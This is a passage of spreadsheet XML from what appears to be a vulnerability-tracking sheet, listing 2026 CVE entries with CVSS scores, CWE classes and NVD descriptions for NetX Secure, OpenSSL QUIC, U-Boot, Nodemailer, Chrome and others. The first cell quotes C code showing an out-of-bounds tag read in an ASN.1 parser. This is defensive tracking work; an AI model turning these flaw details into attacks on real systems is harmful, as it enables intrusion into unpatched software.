          <t>The `_nx_secure_x509_asn1_tlv_block_parse()` function parses ASN.1 TLV (tag-length-value) blocks out of DER-encoded data. It is the primitive underneath all X.509 certificate parsing in NetX Secure, and therefore runs on certificates supplied by a remote peer during the TLS handshake.
The function reads the one-byte ASN.1 tag from the caller's buffer *before* checking that the buffer holds at least one byte. When a caller passes a remaining length of zero, the guard correctly returns `NX_SECURE_X509_ASN1_LENGTH_TOO_LONG`, but the read has already happened one byte past the end of the buffer.
code:
nx_secure/src/nx_secure_x509_asn1_tlv_block_parse.c
```
UINT _nx_secure_x509_asn1_tlv_block_parse(const UCHAR *buffer, ULONG *buffer_length, USHORT *tlv_type,
                                          USHORT *tlv_tag_class, ULONG *tlv_length,
                                          const UCHAR **tlv_data, ULONG *header_length)
{
UINT   current_index;
USHORT current_tag;
ULONG  length;
ULONG  length_bytes;
    current_index = 0;
    current_tag = buffer[current_index];      /* &lt;-- read before the bounds check */
    if (*buffer_length &lt; 1)
    {
        return(NX_SECURE_X509_ASN1_LENGTH_TOO_LONG);
    }
```
The remainder of the function is correctly ordered. The multi-byte length path is guarded by `length_bytes &gt; 4 || length_bytes &gt; *buffer_length` before its read loop, the decoded value is checked against `length &gt; *buffer_length`, and the second single-byte length read follows its own `*buffer_length &lt; 1` guard. The tag read is the only load placed ahead of its check.</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102758</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54873</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t>Issue summary: QUIC process may keep memory for QUIC packet
buffer for much longer period than necessary.
Impact summary: Remote peer can exploit this vulnerability
by sending maliciously crafted packets, making the local
QUIC stack to keep the memory for packet buffers allocated.
The time for which the memory remains allocated is entirely
under the control of the potentially malicious remote peer.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: To save copy operation from the packet buffer to the
stream reassemble buffer the QUIC stack leaves the stream data
on the packet buffer waiting to be copied to a buffer provided
by the local receiving application. The QUIC stack releases
a reference to the packet buffer only after the data are copied
to the application buffer. This design is more efficient for
legitimate data transfers but enables an attacker to allocate a lot
more memory than actually required by the data kept in the receiving
stream buffer.
To mitigate the vulnerability, the QUIC stack now calculates
and monitors memory overhead for every stream. The memory overhead
for a single stream frame is calculated as a difference between the
size of the whole packet that carries the stream frame and the size
of the stream frame itself. The memory overhead for a single stream
frame is added to the total (cumulative) memory overhead QUIC stack
keeps for each stream. Once the cumulative memory overhead exceeds
64kB, the QUIC stack moves the stream frame data from the packet
buffer to the stream buffer, starting with the next packet received.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54873</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102266</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr">
        <is>
          <t>python, go, rust</t>
        </is>
      </c>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q784" s="5" t="inlineStr"/>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S784"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784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102266</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102267</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr">
        <is>
          <t>python, rust</t>
        </is>
      </c>
      <c r="K785" s="5" t="inlineStr"/>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q785" s="5" t="inlineStr"/>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="S785"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785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102267</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102271</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K786" s="5" t="inlineStr"/>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q786" s="5" t="inlineStr"/>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S786"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786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102271</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102272</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S787"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787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102272</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102273</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S788"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788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102273</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100288</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr"/>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>Cleartext storage of sensitive information in the database in Devolutions Server 2026.3.5.0 and earlier allows an attacker with read access to the database to obtain external identity provider tokens and active session identifiers via direct inspection of stored records.</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100288</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103054</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr"/>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions before 12.0.0 contain an authorization bypass vulnerability in the MSSP module that allows authenticated users to add arbitrary tenants to portfolios they own. Attackers can submit tenant UUIDs via the add_tenants_to_portfolio endpoint to claim unclaimed tenants and read their security alerts, incidents, and posture metrics without consent.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103054</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74225</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S791" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains out-of-bounds memory access in dhcp6_parse_options() that fails to validate SERVERID and CLIENTID option lengths from DHCPv6 packets. Attackers on the local network can send crafted DHCPv6 ADVERTISE or REPLY packets during netboot to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74225</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100699</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>Nodemailer is a Node.js email-sending library. In versions &gt;= 9.1.0 and &lt; 10.0.9, the address parser (src/addressparser) mishandles addresses whose local-part is a quoted string and that are followed by RFC 5322 comments, allowing trailing comment-separated domain atoms to be retained in the normalized address. For example, the input "user"@example.com(x)evil.com is parsed to the address value 'user@example.com evil.com', which contains additional attacker-controlled domain text separated by a literal space. This parsed value is used without further strict recipient validation when the message envelope is built (envelope.to in src/mime-node), so a malformed/ambiguous recipient address can be accepted and placed in the SMTP envelope. Whether this results in delivery to an unintended recipient on real SMTP servers has not been confirmed. The issue is a variant of the RFC 5322 comment parsing problem addressed in GHSA-cc9r-2j5m-2m83, affecting the separate quoted-local-part code path. Version 10.0.9 contains a fix.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100699</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97688</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M793" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr"/>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S793"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793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97688</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102310</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Payments in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102310</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102320</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in CORS in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102320</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102330</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K796" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 154.0.8037.92 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102330</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95297</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="inlineStr"/>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Contextual Tasks in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95297</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95330</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
